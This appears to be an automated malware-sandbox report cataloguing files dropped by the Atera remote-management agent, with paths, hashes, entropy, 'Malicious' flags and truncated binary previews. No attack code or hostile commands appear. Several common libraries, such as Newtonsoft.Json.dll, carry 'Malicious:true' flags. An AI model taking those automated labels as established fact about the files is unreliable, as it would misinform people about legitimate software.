                                                                                                                                                                                                                                                                                                                                  SHA1:4716CBD843C8A2A1AA7ED7C95700672E9A863674
                                                                                                                                                                                                                                                                                                                                  SHA-256:B91E3FA4C89230B668EE2DE7D6824DAB708B981F1AE94E734445154BC8A3F6EC
                                                                                                                                                                                                                                                                                                                                  SHA-512:9F0FFB52E060910662AE7AA020AE836119BC609B3E0E9367C7C9D2F2975FC1DDEB1EC1B2F708704C22D666E778B787679BEE5A3CAB5868C09CCB5B57C9026BA2
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^.........." ..0..$...........C... ...`....... ....................................@.................................sC..O....`..@...............0(...........A..8............................................ ............... ..H............text....#... ...$.................. ..`.rsrc...@....`.......&..............@..@.reloc...............,..............@..B.................C......H........(.. ........... @..X...xA......................................j~....%-.&(....s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*.......%...(....*.(....,.r...p......%...%...%...(....*.......%...%...(....*..0..A.......(....,!r...p......%...%...%...%...(....*.......%...%...%...(....*.~....*2r...p.(....*B.....(.........*..(....*R.....(...+%-.&(....*^.....(.....(...+&~..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\System.Diagnostics.DiagnosticSource.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):97328
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.2419469146373485
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:3NSbHB6zBedWp71O37rGMsQ5gbDnTE8iayI2Sf+Ku6JhbDEhr4WTJ7HxQ:3N3OWMsQ56vd2s+KuYc9RTJa
                                                                                                                                                                                                                                                                                                                                  MD5:9F59EFE4EE7BFF13F5866311048A6A80
                                                                                                                                                                                                                                                                                                                                  SHA1:1F20929EE2BCC0BE40848CC739C6F31CAD13DA69
                                                                                                                                                                                                                                                                                                                                  SHA-256:32FB947BAD722480938922DC363DB76AB0079383C6D732B4998C302B03D87200
                                                                                                                                                                                                                                                                                                                                  SHA-512:CCCAAF2396AD1307AF0B51B424005BFB350508059CD9CF3E9641D396CCA3EC4C22EFB0329DF0AFD0B3888E07559B6904A0361B85A80A527CD3139161CFF91DAA
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....0............" ..0..J...........h... ........... ..............................P.....`..................................g..O....................T..0(...........f..T............................................ ............... ..H............text...4I... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B.................h......H.......L...............<^.. ...\f........................................{'...*:.((.....}'...*..0..#........u......,.()....{'....{'...o*...*.*v ..yN )UU.Z()....{'...o+...X*....0..:........r...p......%..{'......%q.........-.&.+.......o,....(-...*..{....*:.((.....}....*....0..#........u......,.()....{.....{....o*...*.*v ..:. )UU.Z()....{....o+...X*....0..:........r-..p......%..{.......%q.........-.&.+.......o,....(-...*..{/...*..{0...*V.((.....}/.....}0...*.0..;........u......

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\System.Memory.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):138288
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.17954530016547
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:G3XFz0qjCIPMAxlUXUKoPfw0kG71AHK7cnO:U0qjCSRE+fw0kG719
                                                                                                                                                                                                                                                                                                                                  MD5:6D055BBD0463057997B216FA41FC1BAA
                                                                                                                                                                                                                                                                                                                                  SHA1:0E3B5685453BFE674252EEFE7B29DDFFE3394F36
                                                                                                                                                                                                                                                                                                                                  SHA-256:94571C1156471E113A0BA58686D0E0F8C8A18B7F5415A17CC00688D6901D6DD6
                                                                                                                                                                                                                                                                                                                                  SHA-512:D3D1FB3588D4AE7279244086069DEF2145FDD341099BD66B801CE1F7EB18F4F68B0043D3CF4BA5C8FA3FA680EF228C3371743AF1E9DCAA64711321EC6A94FCEC
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6wb.........." ..0.................. ... ....... .......................`......\.....@.................................?...O.... ..@...............0(...@..........8............................................ ............... ..H............text...h.... ...................... ..`.rsrc...@.... ......................@..@.reloc.......@......................@..B................s.......H........ ..............\.......D.........................................(&...*>..}......}....*..{....*..{....*..{.....{....3..{.....{....('...*.*..0...........%.u....,..........(....*.*z.{....%-.&.+.o(....{....(X...*..(....zN........o)...s*...*.(....z.s+...*..(....zF(L....(F...s,...*.(....z.(M...s,...*.(....z.s-...*.(....z.s....*..(....zN........o)...s/...*.(....zrr...p(S....c.I...(F...s0...*.(....zBr...p(P...s0...*.(....z.s1...*.(....z.(O...s2...*.(!...z.(V...s2...*.(#...z

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\System.Runtime.CompilerServices.Unsafe.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):17968
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.673983708245621
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:Oh06sbbVVPWU2W+Nyb8E9VF6IYinAM+oCeBhKr+:Oy9eEpYinAMxCAcr+
                                                                                                                                                                                                                                                                                                                                  MD5:351EE6E0FBE6951D43F195DBFD34911A
                                                                                                                                                                                                                                                                                                                                  SHA1:2FAAD5BD1D08D9791C941F6F01BA41473C12DD1F
                                                                                                                                                                                                                                                                                                                                  SHA-256:8B4AF4380F5083A9DC11F5E74FEA942A34DE4AA3740EE0DBCEF92A95AFD656F6
                                                                                                                                                                                                                                                                                                                                  SHA-512:00A0600E0E4541058B8FF5A7314E0C2779B5BA5E3F9FBE9F15556E84D84D8B3C0317116B29A832CB038457EF6CE1FA88149C18E7DD33D27A3ADD3AFFAC5FF9D7
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._...........!.................3... ...@....@.. ....................................@.................................@3..K....@..................0(...`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................p3......H........$..0...................P ......................................._.%c......=.n')...(v..:}.d...3...B...).. .:Q(....L.jt....}Xv.b7y0r.[..$.....q..c.6.....p..2..qHv/.pb.=..9.o"z.. 0P.t%H....U...0...........q....*..0..............q....*...0..............q....*...0.................*.0....................*..0....................*..0............q.........*....0............q.........*....0............*..0..........*....0................*..0...............*...0..............

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote.zip

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):342865
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.9992844075056935
                                                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:9nQP7HqdkykjdqfvImDTIVfygNymRsl8aejvq13W/V191OQB6MBsUUnf7spSg+V1:9nQP7Hqdk/pqo0IVfb5na9Z619MQBxu9
                                                                                                                                                                                                                                                                                                                                  MD5:B3E14504A48BED32C53EC7AAB2CB2C8F
                                                                                                                                                                                                                                                                                                                                  SHA1:0BC0D486A5ED1C4CDF2390229883ED3473926882
                                                                                                                                                                                                                                                                                                                                  SHA-256:ADEA6001759B5604F60BBAEC8CE536A1E189ADEBC7394F9CFF3921CAE40C8C9B
                                                                                                                                                                                                                                                                                                                                  SHA-512:E5A5C09355EB9CB45DC872B59EDBD54F62F15445CA6CAAA3187E31E7928EF4453AE8405D9EEE5D2AEC4FA34965D3006DCF61C060B8691519A2312382612C683F
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:PK..-......i/Y.h.9........-...AgentPackageSTRemote/AgentPackageSTRemote.exe....0".......p.......(.|Le....r....W..........'.-._.{.a.b..-....6u.#."'+.u.9...B..n.....>!(.Tzs4a.g?.....{...J}...v..?.Q...........0.P..m.....2^...X..}k.....VU.HY.*.sZ..Y$H..j.g..p#...9..f/*.8...(...w...a.&B.`.bV/g{.....0.QRH.J.E.c.m.}!..T...N..74.r.*J...u,....\7...o...~.....>`X;.2i..g.7.^0..R0[P..."..7..t.d.........!#.}t..G.%7"p.jnG....(..Rg.K9..Z.#...w.4.351.......-.....v&.t.g?I.pA_.J..`..p,.....4G..h.D....d.:s..H..c....l-y\i.@.....lr.$..LC..._.<W.>.(..0B..rz...... V......v.{"........=..zSqA5.-..2...!.>..rB5g.....Tq.....!8\.S#.K.N.l[...L..|...i2..3pp..2'...Cx.@.<..q.\.<..J....&.\.X....mk...ic.....F.@r..^.^e.?....l#.9..Q..g..7a|2.@.g.h..:....|8...{[..N)~...6..i#.q..F5W.dK<.C..Wm..[KPI.......h.x..SO..m......6..*.........G.TS..p.Z.@..dx.N...\...OmO.Ho.l.^.#6.8.:eM4`...).yU....W....C.]......f.2....:...m;r..;...[...:D()2"....Q!S..ik5.../t.V..:s..f.a.V...}ou..o...j....b.....

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):74288
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.498724993681897
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:y5TTyapvW7AM3ushkm7Xv2piJQ+VASa0oJoU0BaaOP/7HxZoU:yU48q230au/9
                                                                                                                                                                                                                                                                                                                                  MD5:749C51599FBF82422791E0DF1C1E841C
                                                                                                                                                                                                                                                                                                                                  SHA1:BBA9A471E9300BCD4EBE3359D3F73B53067B781D
                                                                                                                                                                                                                                                                                                                                  SHA-256:C176F54367F9DE7272B24FD4173271FD00E26C2DBDBF944B42D7673A295A65E6
                                                                                                                                                                                                                                                                                                                                  SHA-512:F0A5059B326446A7BD8F4C5B1BA5858D1AFFDC48603F6CE36355DAEAAB4ED3D1E853359A2440C69C5DEE3D47E84F7BF38D7ADF8707C277CD056F6EBCA5942CC5
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.........."...0.............z.... ... ....@.. .......................`............`.................................(...O.... ..P...............0(...@....................................................... ............... ..H............text........ ...................... ..`.rsrc...P.... ......................@..@.reloc.......@......................@..B................\.......H........D..4............................................................0..........(....9....(....~9...%-.&~8.....}...s....%.9...(...+~:...%-.&~8.....~...s....%.:...(...+~;...%-.&~8.........s....%.;...(...+~<...%-.&~8.........s....%.<...(...+*.*..(....*...0..-.......(.....3..*r...pr...p(....,.(......(....+..._*....0..(........(......~....(....,..*..(....~....(....*.0.......... ....(......i./.*...............&.........7...%.. ..o.......r9..p( ...,.*......s!.....s!............

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe.config

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):541
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.097123194334321
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:MMHdGp2VvOF9LNFF7ap+5v5OXrRf/2//FicYo4xT:JdsIOvPF7NhOXrRH2/d9y
                                                                                                                                                                                                                                                                                                                                  MD5:D0EFB0A6D260DBE5D8C91D94B77D7ACD
                                                                                                                                                                                                                                                                                                                                  SHA1:E33A8C642D2A4B3AF77E0C79671EAB5200A45613
                                                                                                                                                                                                                                                                                                                                  SHA-256:7D38534766A52326A04972A47CACA9C05E95169725D59AB4A995F8A498678102
                                                                                                                                                                                                                                                                                                                                  SHA-512:A3F1CFF570201B8944780CF475B58969332C6AF9BEA0A6231E59443B05FC96DF06A005FF05F78954DBE2FEC42DA207F6D26025AA558D0A30A36F0DF23A44A35C
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>...<startup>....<supportedRuntime version="v4.0" />....<supportedRuntime version="v2.0.50727" />...</startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>..</configuration>

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.ini

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):12
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.584962500721156
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3:WhXWl:WBQ
                                                                                                                                                                                                                                                                                                                                  MD5:3D66AE5ED06891E8CE75A39A24070844
                                                                                                                                                                                                                                                                                                                                  SHA1:368064119835D4376727A14706C41384446183E8
                                                                                                                                                                                                                                                                                                                                  SHA-256:73DBA8242FDB4DE1393B367A239F730ACA6713E6658BE69F1D8992AD26479176
                                                                                                                                                                                                                                                                                                                                  SHA-512:C0B61F92BB61A7BF90225D1BA5A1BEA0FC077C2481A2149663B546296421855AB3147C3A1F5372EBC920731624BC8578595C18CA9D138691C720FDCB86D03F8A
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:version=23.4

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\Atera.AgentPackage.Common.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):96816
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.180256382950937
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:gJt7dqUlizL21LDdeOKTfLz2L506wFj/XxFoKjhJG/50vks00UfgfgvC7Hxwht:gQUm2H5KTfOLgxFJjE50vksVUfPvC6
                                                                                                                                                                                                                                                                                                                                  MD5:EBBE06F612E1C8B87E3D4AACA15A29B5
                                                                                                                                                                                                                                                                                                                                  SHA1:D2B1317ED96EC0C92CCAF7E85F68EE24F289413F
                                                                                                                                                                                                                                                                                                                                  SHA-256:6CD16DCE27E724C2DAA098F131343FFDBBED0DA5B7EF62542B421A0817DE3A3E
                                                                                                                                                                                                                                                                                                                                  SHA-512:EB079EB409925516118DB4980BE734A645B7444BC51862CE7C95D52E0697B7B937BBACAF421FC5AF1A01D3262C1B19A3CF9376ADB0A5537DE0973E0B7DDE63DF
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....0.d.........." ..0..H..........zf... ........... ..............................Rm....`.................................(f..O.......8............R..0(...........d............................................... ............... ..H............text....F... ...H.................. ..`.rsrc...8............J..............@..@.reloc...............P..............@..B................\f......H........k..D............................................................0..>.......~........o....~......(....&.s.......&...~....(....,..(....&..*...........$...........'........(....*.......*.0..4.......(....o....r...p(....r...p(..........(....(......&..*........00......:.(......}....*..0..Z............( ...,......(!...*~..........("........( ...-..(....s#...........,..($.........(!...*..........&E.......0..G........{....,.(......5~%...r'..po&...rm..pr...po'...tR...r...p((..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\Newtonsoft.Json.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):710192
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.960782910515381
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:PBja5bBvR8Q0TE2HB0WLmvXbsVG1Gw03RzxNHgKhwFBkjSHXP36RMGy1NqTUJ:PBjk38WuBcAbwoA/BkjSHXP36RMG8
                                                                                                                                                                                                                                                                                                                                  MD5:3B395830460C2F72BC6CD12DD096DB0C
                                                                                                                                                                                                                                                                                                                                  SHA1:73063C63D2B562310AF76ABEF2A8B7E697389C94
                                                                                                                                                                                                                                                                                                                                  SHA-256:F7BB07B7C1718DBBCB692AA4296EBEFD7CCD1E55F27BE00703A3CE623AD38D5B
                                                                                                                                                                                                                                                                                                                                  SHA-512:DBCAEDDDC4D99586F1E04FDA97E1C706FBC6BE7BB766E0FE73ADDAD3116517010A3C1C92D7F54D71533B4C4459631966D8D0CF370ECF1F789F7D25FCB2F5A64E
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...p$?..........." ..0.............B.... ........... ....................... ............`....................................O.......................0(.......... ...T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................$.......H.......x...(9............................................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\lh.txt

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe
                                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):86
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.0032352150787975
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3:YhKSLJf2B4VXxrJQNiiOhHJtFHHTOVWTReTL14n:Y5fVXrciiAJHKVWde/Kn
                                                                                                                                                                                                                                                                                                                                  MD5:B8AB4FC8BF110CC525A3E8B1D8EC0D2A
                                                                                                                                                                                                                                                                                                                                  SHA1:8F349F2422E951C336C49F16582F5431B07BFFE6
                                                                                                                                                                                                                                                                                                                                  SHA-256:72B44AD32B6DC9510D3BE0D3DD8AA8A65C6F3648B792313FE07686D4CB59BCC6
                                                                                                                                                                                                                                                                                                                                  SHA-512:96ED32928270DF46B5F393CEAAF0CF347AC600C279443962EF0576010EEBF4226B26FD66404CC1F1CC9A94D89F583DE58310E7C209EB4E566EBA2F8BCFE12FFD
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:{"DownloadedAt":"2024-10-31T15:13:28.4439208-04:00","Hash":"8TVvf703UCtSnZvNZD+3qw=="}

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\log.txt

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):88
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.9257056310153855
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3:nVMz3VfS4EE6LGKWqKRLXsmfWoVUgXAQJ:Vkf7lKWqKRLX/qK
                                                                                                                                                                                                                                                                                                                                  MD5:E8261AA9F4C9B7A12E987F461FFEC79F
                                                                                                                                                                                                                                                                                                                                  SHA1:22EADC50EFDEE81037298CAF27446E4A20FE20E5
                                                                                                                                                                                                                                                                                                                                  SHA-256:13D74DE0F9245118E968869AFB46EC5D026CF930800ED4ECAB017B8790F7224F
                                                                                                                                                                                                                                                                                                                                  SHA-512:0BF595FBA1A1E01AC1863F115581DB428AFBFC71EC414CAD58F04CF989B60A3001A4E6C84EBBD4291A6C7C01AE2A71D7319F40377F384B02C7F871B1CD1EC002
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:..30/10/2024 18:30:31 Downloading installation to: C:\Windows\TEMP\SplashtopStreamer.exe

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools.zip

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):662057
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.999353949499206
                                                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:BBRK7zkUGwDTrw2rTX8HkklhCrdD2TpNwjaIj2nW7+7nZh2bdb:BBRyNJDw2rTX8Hk5rZ+IapZYV
                                                                                                                                                                                                                                                                                                                                  MD5:7895698867D1AD33934A8553B4806DC5
                                                                                                                                                                                                                                                                                                                                  SHA1:32704DF55DEAFF9BF0B4EE0B887541856578938B
                                                                                                                                                                                                                                                                                                                                  SHA-256:EF5854B5E800A534A08C083D4A3956DFC0A474FF540CAE9BF0A9077A213B2FF9
                                                                                                                                                                                                                                                                                                                                  SHA-512:20337093DDC5322C4B96C7BF26F1A0B966FAFDE70A96F7E9B5E9D36ACAC7D862BD2A50CAE9A63731B23904A9256C94CD3BB4E19768130580511EC4C408536A58
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:PK..-.....B.]Y.]Up........3...AgentPackageSystemTools/AgentPackageSystemTools.exe....(........j........A.U...6X;..qH?(.8....1...FU..ux,....R.mn}..p.8.}m..N.o#.. <..Q.t..\...hP.9.....n,..X...%......S% ...x..+&Dq..f.Ao..o9.B .....?..-)X..v.,g<....5.|.....[.z<.&..D.P.(..1 i....{....G_.2.[m....Q...7..~#....<Aw..w..o...U.?...2....9.5.{e..H.$.,..T.C.H...siX..f....D.Pf!.......f.87e#......3...x.I.#...-..(.;....w]_.8#..\...a.%.K^z~...a}..~.g..C...@ek,i"^>s..c.'......Y.\.h....=.V....<.c..^B..Z....%..|'..3m..@}n..F..x....+.\.m.4..>.&....L....<.......y. ..X.K..@m~..>`1Y. ...Pv.Y.c.....w.....h.y.yL..|&.%}}Nr....E...u.4..`f...}..1...)...r..>).M.n.I.>..B........>.>...V...8.W..-.U..a..E........_#`y..X.....S..e..^.45...s....wp..$.r.D..+'....p..CK..B.=..q. .I.1r..u-9ZB.Oo.M.....3.._............:....K.....G./...I...d]p.....ht...k~...t..!.1.sf..?......k......A....n.3...\Z.f..l...X[........S....f....pG..p..I.... .(........E..F.u.......|..;.!.....w...%uL..i.V

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):51752
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.276903482604295
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:MsK/GcLpkOGiHuAQ+INjkfEQ3Tnz8AnTqLx3OEpYi60nN:M/zpqiOAbINwfEQDz8QIx3v76GN
                                                                                                                                                                                                                                                                                                                                  MD5:C0F02EAA3EB28659D8F1BCBA8DE48479
                                                                                                                                                                                                                                                                                                                                  SHA1:5BE3C69E3F46DAFF4967484A09EB8C4A1F4A7F0F
                                                                                                                                                                                                                                                                                                                                  SHA-256:6BEFB51A6639CAE7E25570F5259F7B1F2D9B9B6539177D64D2ED8BE50DDE6268
